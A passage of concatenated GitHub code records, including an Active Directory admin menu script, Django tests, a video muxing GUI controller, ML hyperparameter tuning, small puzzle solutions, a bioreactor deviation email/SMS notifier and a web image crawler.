subprocess.Popen([\"powershell.exe\", \".\\\\scripts\\\\cup\\\\dccheck.ps1\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n\r\n lines = len(open('.\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt').readlines());\r\n\r\n p1 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt\"],stdout=sys.stdout);\r\n p2 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\dcdiag.txt\"],stdout=sys.stdout);\r\n\r\n #print (lineas2);\r\n\r\n if (lines != 0):\r\n print();\r\n print(\" Your system is NOT Domain Controller, use option 1 to promote your system in a Domain Controller\");\r\n bfunc.PressKey();\r\n else:\r\n print();\r\n os.system('netdom query fsmo');\r\n bfunc.PressKey();\r\n\r\n#Fiveth Option, check Global Catalog\r\ndef GlobalCatalog():\r\n print();\r\n print(\" [*] Checking if your system is Domain Controller \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n p = subprocess.Popen([\"powershell.exe\", \".\\\\scripts\\\\cup\\\\dccheck.ps1\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n\r\n lines = len(open('.\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt').readlines());\r\n\r\n p1 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt\"],stdout=sys.stdout);\r\n p2 = 
subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\dcdiag.txt\"],stdout=sys.stdout);\r\n\r\n #print (lineas2);\r\n\r\n if (lines != 0):\r\n print();\r\n print(\" Your system is NOT Domain Controller, use option 1 to promote your system in a Domain Controller\");\r\n bfunc.PressKey();\r\n else:\r\n print();\r\n p = subprocess.Popen([\"powershell.exe\", \"Get-ADDomainController | ft Name,IsGlobalCatalog\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n bfunc.PressKey();\r\n\r\n\r\n\r\n#cuarto menu\r\ndef FourthMenu():\r\n time.sleep(0.5)\r\n print(\"\");\r\n print(\" [*] Wait while it loads the menu \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n while True:\r\n print (\"\");\r\n print (\"============= Menu of system check as Domain Controller =============\");\r\n print (\"\");\r\n print (\" 1 -> Promote this server to Domain Controller \");\r\n print (\" 2 -> Check if this server is a Domain Controller \");\r\n print (\" 3 -> Delete the Active Directory Domain Service \");\r\n print (\" 4 -> Check FSMO Roles \");\r\n print (\" 5 -> Check Global Catalog \");\r\n print (\" 6 -> Back (previous menu) \");\r\n print (\"\");\r\n numOptions = 6;\r\n opcion = bfunc.ChooseOption(numOptions);\r\n if (opcion == 1):\r\n bfunc.PromoteDC();\r\n elif (opcion == 2):\r\n bfunc.CheckDC();\r\n elif (opcion == 3):\r\n bfunc.DeleteAD();\r\n elif (opcion == 4):\r\n FSMORoles();\r\n elif (opcion == 5):\r\n GlobalCatalog();\r\n elif (opcion== 6):\r\n print();\r\n print(\" [*] Wait while it loads the menu \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n sys.exit();\r\n else:\r\n break;\r\n\r\n\r\n# This part of code of here is just a way of 'security' to avoid that the users\r\n# execute the another scripts (.exe or .py) directly.\r\n# This is because for a good working of this program, first, is necessary check\r\n# Active Directory and Domain Controller parameters and this code is in the firsts scripts.\r\n\r\nsearch = \"security.txt\"\r\ndirectory = os.getcwd()\r\ntotal = 0\r\n\r\nif (len(sys.argv) > 1):\r\n if (not os.path.isdir(sys.argv[1])):\r\n #print(sys.argv[1],\" no se reconoce como directorio\")\r\n sys.exit(1)\r\n directory = sys.argv[1]\r\n\r\nfor root, dir, ficheros in os.walk(directory):\r\n for fichero in ficheros:\r\n if (search in fichero.lower()):\r\n #print(root+\"\\\\\"+fichero)\r\n total += 1\r\n\r\n#print(\"En total hay\", total, \"archivos con\", buscar)\r\nif (total == 1):\r\n os.system('del menus\\\\security.txt');\r\n FourthMenu();\r\nelse:\r\n sys.exit();\r\n","repo_name":"alb3rtov/ICAAD-Software","sub_path":"menus/adconfig.py","file_name":"adconfig.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29037383753","text":"import json\nfrom datetime import datetime\n\nimport pytest\nfrom django.http import Http404\nfrom django.urls import reverse\n\nfrom donate_anything.charity.models import AppliedBusinessEdit, AppliedOrganizationEdit\nfrom donate_anything.charity.tests.factories import (\n AppliedBusinessEditFactory,\n AppliedOrganizationEditFactory,\n)\nfrom donate_anything.charity.views.list import organization\n\n\npytestmark = pytest.mark.django_db\n\n\ndef _format_datetime_to_content_str(dt: datetime):\n return dt.strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3] + \"Z\"\n\n\nclass TestOrganizationView:\n def test_organization_view_success(self, charity, client):\n response = client.get(\n 
reverse(\"charity:organization\", kwargs={\"pk\": charity.id})\n )\n assert response.status_code == 200\n assert response.context[\"name\"] == charity.name\n assert response.context[\"description\"] == charity.description\n assert response.context[\"how_to_donate\"] == charity.how_to_donate\n\n def test_organization_view_not_found(self, rf):\n fake_id = 1\n request = rf.get(reverse(\"charity:organization\", kwargs={\"pk\": fake_id}))\n with pytest.raises(Http404):\n organization(request, fake_id)\n\n\nclass TestViewEdits:\n @pytest.mark.parametrize(\n \"factory,model,view\",\n [\n (\n AppliedOrganizationEditFactory,\n AppliedOrganizationEdit,\n \"charity:applied-organization-edits\",\n ),\n (\n AppliedBusinessEditFactory,\n AppliedBusinessEdit,\n \"charity:applied-business-edits\",\n ),\n ],\n )\n def test_applied_organization_edits(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n model,\n view,\n ):\n client.force_login(user)\n if factory == AppliedOrganizationEditFactory:\n factory.create_batch(30, proposed_entity=organization_application)\n response = client.get(\n reverse(view, kwargs={\"pk\": organization_application.id})\n + \"?page=2&unseen=1\"\n )\n else:\n factory.create_batch(30, proposed_entity=business_application)\n response = client.get(\n reverse(view, kwargs={\"pk\": business_application.id})\n + \"?page=2&unseen=1\"\n )\n assert response.status_code == 200\n content = json.loads(response.content.decode())[\"data\"]\n assert len(content) == 5, \"Pagination is 25 in length. 30-25 is 5.\"\n assert len(content[0]) == 5, \"pk, username, edit, created, updated\"\n obj = model.objects.get(id=int(content[0][0]))\n assert content[0][1] == obj.user.username\n assert content[0][2] == obj.edit\n assert content[0][3] == _format_datetime_to_content_str(obj.created)\n assert content[0][4] == _format_datetime_to_content_str(obj.updated)\n\n @pytest.mark.parametrize(\n \"factory,view\",\n [\n (AppliedOrganizationEditFactory, \"charity:applied-organization-edits\"),\n (AppliedBusinessEditFactory, \"charity:applied-business-edits\"),\n ],\n )\n def test_show_only_unseen(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n view,\n ):\n client.force_login(user)\n if factory == AppliedOrganizationEditFactory:\n not_seen = factory.create(\n proposed_entity=organization_application, viewed=False\n )\n factory.create(proposed_entity=organization_application, viewed=True)\n response = client.get(\n reverse(view, kwargs={\"pk\": organization_application.id}) + \"?unseen=1\"\n )\n else:\n not_seen = factory.create(\n proposed_entity=business_application, viewed=False\n )\n factory.create(proposed_entity=business_application, viewed=True)\n response = client.get(\n reverse(view, kwargs={\"pk\": business_application.id}) + \"?unseen=1\"\n )\n assert response.status_code == 200\n content = json.loads(response.content.decode())[\"data\"]\n assert len(content) == 1, \"Should only see the not-closed/read one.\"\n assert content[0] == [\n not_seen.id,\n not_seen.user.username,\n not_seen.edit,\n _format_datetime_to_content_str(not_seen.created),\n _format_datetime_to_content_str(not_seen.updated),\n ]\n\n @pytest.mark.parametrize(\n \"factory,view\",\n [\n (AppliedOrganizationEditFactory, \"charity:applied-organization-edits\"),\n (AppliedBusinessEditFactory, \"charity:applied-business-edits\"),\n ],\n )\n def test_show_all_edits(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n 
view,\n    ):\n        self.test_show_only_unseen(\n            organization_application, business_application, client, user, factory, view\n        )\n        if factory == AppliedOrganizationEditFactory:\n            response = client.get(\n                reverse(view, kwargs={\"pk\": organization_application.id})\n            )\n        else:\n            response = client.get(reverse(view, kwargs={\"pk\": business_application.id}))\n        assert response.status_code == 200\n        content = json.loads(response.content.decode())[\"data\"]\n        assert len(content) == 2\n        seen = []\n        for x in content:\n            assert len(x) == 6\n            seen.append(x[5])\n        assert set(seen) == {True, False}\n","repo_name":"Donate-Anything/Donate-Anything","sub_path":"donate_anything/charity/tests/views/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} {"seq_id":"30454709876","text":"import sys\nimport glob\nimport logging\nimport threading\n\nfrom events import Events\nfrom pymkv import MKVFile as MKVFile\n\nfrom PySide2.QtWidgets import QFileDialog, QListWidgetItem, QListWidget\nfrom PySide2.QtCore import QTranslator as tr\nimport PySide2.QtCore\n\nfrom pymkv_wrapper import PymkvWrapper\nfrom gui_helper import GuiHelper\n\nlogger = logging.getLogger(__name__)\n\n\nclass BatchFileController:\n\n    def __init__(self):\n        self._source_1_list = []\n        self._source_2_list = []\n        self.events = Events()\n\n        self._tracks_1 = []\n        self._tracks_2 = []\n\n        self._user_settings_1 = []\n        self._user_settings_2 = []\n\n        self.output_directory = None\n\n        self.events.on_batch_list_update += self.generate_item\n\n    @property\n    def source_1_list(self):\n        return self._source_1_list\n\n    @source_1_list.setter\n    def source_1_list(self, file_list):\n        self._source_1_list = file_list\n        self.events.on_batch_list_update(file_list, 1)\n\n    @property\n    def source_2_list(self):\n        return self._source_2_list\n\n    @source_2_list.setter\n    def source_2_list(self, file_list):\n        self._source_2_list = file_list\n        self.events.on_batch_list_update(file_list, 2)\n\n    @property\n    def user_setting_1(self):\n        return self._user_settings_1\n\n    @property\n    def user_setting_2(self):\n        return self._user_settings_2\n\n    def generate_item(self, file_list, list_num: int):\n\n        if list_num == 1:\n            self._source_1_list.extend(file_list)\n        elif list_num == 2:\n            self._source_2_list.extend(file_list)\n\n        for file in file_list:\n            item = QListWidgetItem(file)\n            self.events.batch_file_item_generated(item, list_num)\n\n    def generate_track_item(self, ref_num: int):\n        \"\"\"\n        Generate the track list for the two input directories with the first file in the list\n        :return:\n        \"\"\"\n\n        if len(self._source_1_list) != 0 and ref_num == 1:\n\n            self._tracks_1 = PymkvWrapper.process_file(self._source_1_list[0])\n\n            # TODO: turn item generation into a GUI helper\n            for track in self._tracks_1:\n\n                track_name = \"N/A\"\n                track_type = track._track_type\n\n                if track.track_name is not None:\n                    track_name = track.track_name\n\n                track_item_1 = QListWidgetItem(\"Track Name: \" + track_name + \" | \" + \"Type: \" + track_type)\n                track_item_1.setFlags(track_item_1.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsUserCheckable)\n                track_item_1.setFlags(track_item_1.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsEnabled)\n                track_item_1.setCheckState(PySide2.QtCore.Qt.CheckState.Unchecked)\n\n                self.events.ref_tracks_generated(self._source_1_list[0], track_item_1, 1)\n\n        if len(self._source_2_list) != 0 and ref_num == 2:\n\n            self._tracks_2 = PymkvWrapper.process_file(self._source_2_list[0])\n            # TODO: turn item generation into a GUI helper\n            for track in self._tracks_2:\n\n                track_name = \"N/A\"\n                track_type = track._track_type\n\n                if track.track_name is not None:\n                    track_name = track.track_name\n\n                track_item_2 = QListWidgetItem(\"Track Name: \" + track_name + \" | \" + \"Type: \" + track_type)\n                track_item_2.setFlags(track_item_2.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsUserCheckable)\n                track_item_2.setFlags(track_item_2.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsEnabled)\n                track_item_2.setCheckState(PySide2.QtCore.Qt.CheckState.Unchecked)\n\n                self.events.ref_tracks_generated(self._source_2_list[0], track_item_2, 2)\n\n    def gather_all_selected_track(self, list_1: QListWidget, list_2: QListWidget):\n\n        self._user_settings_1 = []\n        self._user_settings_2 = []\n        logger.debug(\"Gathering selected tracks\")\n\n        for index in range(list_1.count()):\n\n            item = list_1.item(index)\n            if item.checkState() == PySide2.QtCore.Qt.Checked:\n                self._user_settings_1.append(index)\n\n        logger.debug(\"Reference 1 Tracks : \" + str(self._user_settings_1).strip('[]'))\n\n        for index in range(list_2.count()):\n\n            item = list_2.item(index)\n            if item.checkState() == PySide2.QtCore.Qt.Checked:\n                self._user_settings_2.append(index)\n\n        logger.debug(\"Reference 2 Tracks : \" + str(self._user_settings_2).strip('[]'))\n\n    def batch_mux_files(self):\n        # Run the mux on a background worker thread so the GUI stays responsive.\n        batch_mux_thread = threading.Thread(\n            target=PymkvWrapper.batch_mux_files,\n            args=(self.source_1_list, self.source_2_list,\n                  self.user_setting_1, self.user_setting_2,\n                  self.output_directory))\n        batch_mux_thread.start()\n\n    def clear_all(self):\n        self._source_1_list = []\n        self._source_2_list = []\n        self._tracks_1 = []\n        self._tracks_2 = []\n        self._user_settings_1 = []\n        self._user_settings_2 = []\n        self.events.clear_all()\n","repo_name":"adriankchan/AnotherMKVMuxGUI","sub_path":"batch_file_controller.py","file_name":"batch_file_controller.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} {"seq_id":"15779594921","text":"import os\nimport warnings\n\nimport numpy\nimport pandas as pd\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, Trials, STATUS_FAIL\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nfrom src.data_path import load_data\nfrom src.data_readers.tagged_preg_reader import tagged_data_reader\nfrom src.main.drug_pregnancy_experiments.pregnancy_drug_experment import transform_labels\n\nos.chdir('..\\\\..\\\\..')\nlarge_number = 1\n\n\ndef score(params):\n    print(\"Training with params : \")\n    print(params)\n    # for p in ['n_estimators','num_k_best']:\n    #     params[p] = int(params[p])\n    stat = STATUS_OK\n    curr_score = 0\n\n    try:\n        all_auc = []\n        for i in range(10):\n            kf = StratifiedKFold(n_splits=10, random_state=i, shuffle=True)\n            model = make_pipeline(\n                StandardScaler(),\n                KNeighborsClassifier(**params)\n            )\n            val = cross_val_score(model, X_cv, y, cv=kf, n_jobs=4, scoring='roc_auc')\n            all_auc.extend(val)\n\n        curr_score = np.array(all_auc).mean()\n\n    except:\n        stat = STATUS_FAIL\n\n    print(\"\\tAUC {0}\\n\\n\".format(curr_score))\n    return {'loss': 1 - curr_score, 'status': stat}\n\n\ndef optimize(trials):\n    best = fmin(score, space, algo=tpe.suggest, trials=trials, max_evals=300)\n    print('best params:')\n    print(best)\n\n\nwarnings.filterwarnings(\"ignore\")\n\nX_unlabled = load_data()\n\ncols =
list(X_unlabled.columns)\ncols.remove('drugBank_id')\n#\n# sums = X_unlabled[cols].astype(bool).sum()\n# limit = 3#len(raw_X)*0.0005\n# sums = sums[sums>=limit]\n# cols = list(sums.index)\n# cols.append('drugBank_id')\n# #raw_tagged_data = raw_tagged_data.loc[:,sums.index]\n# X_unlabled = X_unlabled.loc[:,cols]\n#\n\npreg_tagged_data_reader = tagged_data_reader()\nX_cv = X_unlabled.merge(preg_tagged_data_reader.read_all(),on='drugBank_id',how='inner')\ny_cv = X_cv['preg_class']\ndel X_cv['drugBank_id']\ndel X_cv['preg_class']\n\ny = numpy.ravel(pd.DataFrame(transform_labels(y_cv)).values)\ntrials = Trials()#Trials object where the history of search will be stored\n\n\nspace = {\n 'n_neighbors': hp.uniformint('n_neighbors', 1, 200), # hp.normal\n 'weights': 'distance',#hp.choice('weights', ['distance']),\n 'n_jobs': 4,\n 'p': 1#hp.choice('p', [1,2,3]),\n}\n\nif __name__ == \"__main__\":\n optimize(trials)\n","repo_name":"asnatm/ddi","sub_path":"src/main/drug_pregnancy_experiments/hyper_params_NN.py","file_name":"hyper_params_NN.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29778193702","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 23 20:51:54 2022\n\n@author: terad\n\"\"\"\n\nS = list(input())\na,b = map(int,input().split())\n\nA,B = a-1,b-1\nS[A],S[B] = S[B],S[A]\n\nprint(''.join(S))","repo_name":"daichiterazawa/Atcoder","sub_path":"AtCoder Beginner Contest 236/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74222037271","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def balanceBST(self, root: TreeNode) -> TreeNode:\n self.arr=[]\n self.inorder(root)\n return self.construct(0,len(self.arr)-1)\n \n def construct(self,beg,end):\n if beg>end:\n return None\n \n mid=(beg+end)//2\n root=TreeNode(self.arr[mid],None,None)\n \n root.left=self.construct(beg,mid-1)\n root.right=self.construct(mid+1,end)\n \n return root\n \n def inorder(self,root):\n if root==None:\n return \n \n self.inorder(root.left)\n self.arr.append(root.val)\n self.inorder(root.right)\n \n","repo_name":"Gautam1589/LeetCoding-GFG","sub_path":"1382-balance-a-binary-search-tree/1382-balance-a-binary-search-tree.py","file_name":"1382-balance-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73840256153","text":"from pycatchmod.io.excel import (read_parameters, read_results,\n excel_parameter_adjustment, compare, open_workbook)\nimport json\nimport os\nimport pytest\nimport numpy as np\n\nJSON_SAMPLE = os.path.join(os.path.dirname(__file__), \"data\", \"thames.json\")\nEXCEL_SAMPLE = os.path.join(os.path.dirname(__file__), \"data\", \"thames.xls\")\n@pytest.fixture\ndef wb():\n return open_workbook(EXCEL_SAMPLE)\n\ndef test_read_parameters(wb):\n name, subcatchments = read_parameters(wb)\n assert(name == \"Thames\")\n assert(len(subcatchments) == 3)\n\n # check all parameters have been read correctly by comparing them to the\n # json version of the model\n json_data = json.load(open(JSON_SAMPLE,\"r\"))\n parameter_names = list(json_data[\"subcatchments\"][0].keys())\n for n in range(0, len(subcatchments)):\n for key 
in parameter_names:\n assert(subcatchments[n][key] == json_data[\"subcatchments\"][n][key])\n\ndef test_read_results(wb):\n results = read_results(wb)\n\n # all arrays should have the same length\n for a in results.values():\n assert(len(a) == 31)\n\n assert(results[\"dates\"][0] == np.datetime64(\"1920-01-01\"))\n assert(results[\"dates\"][-1] == np.datetime64(\"1920-01-31\"))\n\n # we use some dummy values here to make testing easy\n\n assert(results[\"recharge\"][-1] == 31)\n assert(results[\"smd_upper\"][-1] == 62)\n assert(results[\"smd_lower\"][-1] == 93)\n\n assert(results[\"flow_sim\"][-1] == 124)\n assert(results[\"flow_obs\"][-1] == 278)\n\n assert(results[\"rainfall\"][-1] == 185)\n assert(results[\"pet\"][-1] == 216)\n","repo_name":"pywr/pycatchmod","sub_path":"tests/test_excel.py","file_name":"test_excel.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"13141186611","text":"import pandas as pd\nimport datetime\nimport os\nimport smtplib\nfrom twilio.rest import Client\n\nnotified = {}\nrpm = 1000\n\n\ndef read_csv():\n \"\"\"\n Reads the contents of the reactor's csv file.\n\n :return: a pandas dataframe of the reactor's csv\n \"\"\"\n dtype = {'Timestamp': 'str', 'Agitation [rpm]': 'float', 'Airflow [mL/s]': 'float', 'DO [%]': 'float',\n 'Temp [C]': 'float', 'pH': 'float', 'Feed Pump [ml/hr]': 'float', 'Base Pump [mL/hr]': 'float',\n 'Antifoam Pump [mL/hr]': 'float'}\n data = pd.read_csv('dg1.csv', dtype=dtype, parse_dates=['Timestamp'], low_memory=False, na_filter=False)\n\n return data\n\n\ndef check_constants(data, setpoint, tolerance):\n \"\"\"\n Checks if all constant parameters (temp, airflow, and agitation) are within their tolerance range and if not,\n determines where the deviation first occurred.\n\n :param data: the recorded values of a parameter (temp, airflow, or agitation)\n :type data: a Pandas Series\n :param setpoint: the target value a parameter should be held\n :type setpoint: float\n :param tolerance: a numerical amount the parameter is allowed to deviate from the setpoint before it is accepted to\n be out of the operating range in order to accommodate equipment noise\n :type tolerance: float\n :return: Index where current deviation began occurring, otherwise None\n \"\"\"\n if abs(setpoint - data.iat[-1]) > tolerance:\n for idx in reversed(data.index):\n if abs(setpoint - data.iat[idx]) > tolerance:\n continue\n else:\n return idx + 1\n else:\n return None\n\n\ndef check_pumps(pump, data, setpoint, tolerance):\n \"\"\"\n Checks for one out of three different possible pump deviations each time this function is called. These deviations\n include how long a pump has been off, how long a pump has been on, and whether or not the pump flow rate is within\n the tolerance of the setpoint. 
The last recorded data value will always fall into one of these categories and is\n traced back to the index where sequence first began.\n\n :param pump: The header of a pump as it is written in the reactor's csv file\n :type pump: str\n :param data: the recorded values of a pump\n :type data: a Pandas Series\n :param setpoint: the target value a parameter should be held\n :type setpoint: float\n :param tolerance: a numerical amount the parameter is allowed to deviate from the setpoint before it is accepted to\n be out of the operating range in order to accommodate equipment noise\n :type tolerance: float\n :return: index of the Pandas Series where the current sequence began and the number of minutes the current sequence\n is allowed to persist\n :rtype: tuple containing two ints\n \"\"\"\n global rpm\n pump_specs = {'Base Pump [mL/hr]': {'on': 5, 'off': 310}, 'Feed Pump [ml/hr]': {'on': 50, 'off': 310},\n 'Antifoam Pump [mL/hr]': {'on': 20, 'off': 180}}\n\n if data.iat[-1] == 0: # checks how long a pump has been inactive\n for idx in reversed(data.index):\n if data.iat[idx] == 0:\n if idx == 0:\n return idx, 660\n continue\n else:\n if rpm == 1000:\n return idx + 1, 660\n elif rpm == 1500:\n return idx + 1, pump_specs[pump]['off']\n\n else:\n if abs(setpoint - data.iat[-1]) > tolerance: # checks how long a pump has been out of the tolerance range\n for idx in reversed(data.index):\n if abs(setpoint - data.iat[idx]) > tolerance and data.iat[idx] != 0:\n if idx == 0:\n return idx, 5\n continue\n else:\n return idx + 1, 5\n\n else: # check how long a pump has been running\n for idx in reversed(data.index):\n if data.iat[idx] != 0:\n if idx == 0:\n return idx, pump_specs[pump]['on']\n continue\n else:\n return idx + 1, pump_specs[pump]['on']\n\n\ndef agitation(data):\n \"\"\"\n Checks the reactor's csv file to see if the agitation ramped up to 1500. Under normal operating conditions, the rpm\n would jump from 1000 to 1500 when the feed is first triggered. This function cannot mistake any agitation deviations\n for an rpm ramp and should not be called once it has already detected an rpm ramp. 
Since the setpoint of an\n agitation ramp increases instantly, this function must be called every time a new row of data is logged to the\n reactor's csv file or else this function will miss the agitation jump.\n\n :param data: the recorded values of the motor\n :type data: a Pandas Series\n :return: True if an agitation jump is detected, False otherwise\n \"\"\"\n if abs(data.iat[-1] - 1500) < 10:\n if abs(data.iat[-2] - data.iat[-1]) > 50:\n return True\n return False\n\n\ndef check_pH(data, max_ph, min_ph=7.195):\n \"\"\"\n Checks the pH of the reactor and makes sure its within the allowed range of the pH (pH will rise during a\n starvation).\n\n :param data: the recorded values of the reactor's pH\n :type data: a Pandas Series\n :param max_ph: the highest pH value allowed in order to accommodate feed spikes\n :type max_ph: float\n :param min_ph: the lowest pH value allowed, which should never fall far from the set point of 7.20\n :type min_ph: float\n :return: Index of the Pandas Series where the deviation first began, otherwise if no deviation is found, None\n \"\"\"\n if data.iat[-1] < min_ph:\n for idx in reversed(data.index):\n if data.iat[idx] < min_ph:\n continue\n else:\n return idx + 1\n elif data.iat[-1] > max_ph:\n for idx in reversed(data.index):\n if data.iat[idx] > max_ph:\n continue\n else:\n return idx + 1\n else:\n return None\n\n\ndef check_time(timestamps, index, minutes=5):\n \"\"\"\n This function is used to check the length of time a parameter has been running at its current conditions and whether\n or not it has exceeded the amount of time it is allowed to run at these conditions. In the case of pH, temperature,\n airflow, and agitation, this function is only called when a known deviation from the set point is occurring. In the\n case of pumps, this will check the amount of time a pump has been at it's current operating conditions (on, off, or\n out of tolerance) and determine if it exceeds the amount of time it should be running at this condition. The default\n maximum amount of time to tolerate a deviation is 5 minutes for all parameters other than pumps. 
Pumps have \n different runtime tolerances depending on the type of pump and the current operating state it is in so the minutes \n argument should always be given when used for a pump.\n\n :param timestamps: The reactor's recorded datetime.datetime objects in the format of '%Y-%m-%d %H:%M:%S.%f'\n :type timestamps: a Panda Series\n :param index: the index where the deviation was first found\n :type index: int\n :param minutes: number of minutes a parameter is allowed to run in it's current operating state.\n :type minutes: int\n :return: True if the length of a deviation has exceeded the tolerance length, otherwise, False\n \"\"\"\n\n tolerance = datetime.timedelta(minutes=minutes)\n length = timestamps.iat[-1] - timestamps.iat[index]\n if length > tolerance:\n return True\n else:\n return False\n\n\ndef email_alert(param, time):\n \"\"\"\n Alerts the fermentation associate of the deviating parameter along with the start time of the deviation by email.\n :param param: the failing parameter written as it appears in the reactor's csv file\n :type param: str\n :param time: start time of the deviation\n :type time: datetime.datetime object in the format of '%Y-%m-%d %H:%M:%S.%f'\n :return: None\n \"\"\"\n associate_email = 'biosimulator@gmail.com'\n # login to SMTP server\n smtp_obj = smtplib.SMTP('smtp.gmail.com', 587)\n smtp_obj.ehlo()\n smtp_obj.starttls()\n smtp_obj.login(associate_email, os.environ.get('EMAIL_PASS'))\n msg = f'Deviation with {param} at {time}'\n smtp_obj.sendmail(associate_email, associate_email, 'Subject: Deviation Notifier\\n\\n' + msg)\n\n\ndef text_alert(param, time):\n \"\"\"\n Alerts the fermentation associate of the deviating parameter along with the start time of the deviation by text.\n Currently unused because the Twilio account is only on a trial version.\n :param param: the failing parameter\n :type param: str\n :param time: start time of the deviation\n :type time: datetime.datetime object in the format of '%Y-%m-%d %H:%M:%S.%f'\n :return: None\n \"\"\"\n associate_phone = os.environ.get('PHONE')\n client = Client(os.environ.get('TWILIO_SID'), os.environ.get('TWILIO_TOKEN'))\n message = client.messages.create(\n to=associate_phone,\n from_=\"+14154814546\", # Twilio phone number is expired\n body=f'Deviation with {param} at {time} ')\n\n\ndef check_deviations():\n \"\"\"\n This is the main function of this module and it splits the Pandas Dataframe into its individual Series and sends\n each Pandas Series and any necessary arguments to the corresponding helper function. 
If it is determined necessary\n    to notify the fermentation associate, this calls email_alert and text_alert to do so.\n\n    :return: None\n    \"\"\"\n    global rpm, notified\n    # the setpoints of each parameter at index 0 along with the tolerated amount it is allowed to deviate\n    setpoints = {'Agitation [rpm]': (rpm, 10), 'Airflow [mL/s]': (60, 3), 'Temp [C]': (32, 2),\n                 'pH': (7.20, 0.2), 'Feed Pump [ml/hr]': (40, 3), 'Base Pump [mL/hr]': (35, 3),\n                 'Antifoam Pump [mL/hr]': (1, 0.5)}\n    data = read_csv()\n\n    for label, content in data.iteritems():\n        notify = None\n        if label in setpoints.keys():\n            deviation_idx = None\n            setpoint, tolerance = setpoints[label]\n\n            if rpm == 1000 and agitation(content):\n                rpm = 1500\n\n            # check temp, airflow and agitation\n            if 'temp' in label.lower() or 'airflow' in label.lower() or 'agitation' in label.lower():\n                deviation_idx = check_constants(content, setpoint, tolerance)\n\n            # check pH\n            elif 'ph' in label.lower():\n                if rpm == 1500:\n                    deviation_idx = check_pH(content, max_ph=7.22)\n                else:\n                    deviation_idx = check_pH(content, max_ph=7.27)\n\n            if deviation_idx is not None or 'pump' in label.lower():\n                # pumps must call check_time function every time new data is logged because there are 3 ways a pump can\n                # deviate that have different time dependencies\n\n                if 'pump' in label.lower():\n                    # print(f'{label} {check_pumps(label, content, setpoint, tolerance)}')\n                    deviation_idx, time_allowance = check_pumps(label, content, setpoint, tolerance)\n                    notify = check_time(data[\"Timestamp\"], deviation_idx, minutes=time_allowance)\n                else:\n                    notify = check_time(data[\"Timestamp\"], deviation_idx)\n\n            if notify and label not in notified.keys():\n                notified[label] = 0\n                # email_alert(label, data[\"Timestamp\"][deviation_idx])  # uncomment to send email alerts\n                # text_alert(label, data[\"Timestamp\"][deviation_idx])  # uncomment to send text alerts\n                print(f'{label} deviation at {data[\"Timestamp\"][deviation_idx]}')\n\n            if label in notified.keys() and not notify:\n                notified[label] += 1\n                # if deviation doesn't occur again in the next 120 data logs (120 mins) it is counted as fixed\n                # NOTE: does not have to be a consecutive 120 logs\n                if notified[label] > 120:\n                    del notified[label]\n\n","repo_name":"Michaelli26/bioreactor-simulator","sub_path":"deviation_notifier.py","file_name":"deviation_notifier.py","file_ext":"py","file_size_in_byte":12175,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} {"seq_id":"10810226201","text":"import datetime\nimport sys\nfrom run_time import my_time\nfrom crawler import PttSpider, Download, ArticleInfo\n\n\n@my_time\ndef main():\n    # python beauty_spider2.py [board name] [pages to crawl] [minimum push count]\n    # python beauty_spider2.py beauty 3 10\n    board, page_term, push_rate, limit = sys.argv[1], int(\n        sys.argv[2]), int(sys.argv[3]), int(sys.argv[4])\n    # board, page_term, push_rate = 'beauty', 5, 20  # for debugger\n    print('start crawler ptt {}...'.format(board))\n    crawler_datetime = datetime.datetime.now()\n    spider = PttSpider(board=board,\n                       parser_page=page_term,\n                       push_rate=push_rate)\n    spider.run()\n    datetime_format = '%Y%m%d%H%M%S'\n    crawler_time = '{}_PttImg_{:{}}'.format(\n        spider.board, crawler_datetime, datetime_format)\n    info = ArticleInfo.data_process(spider.info, 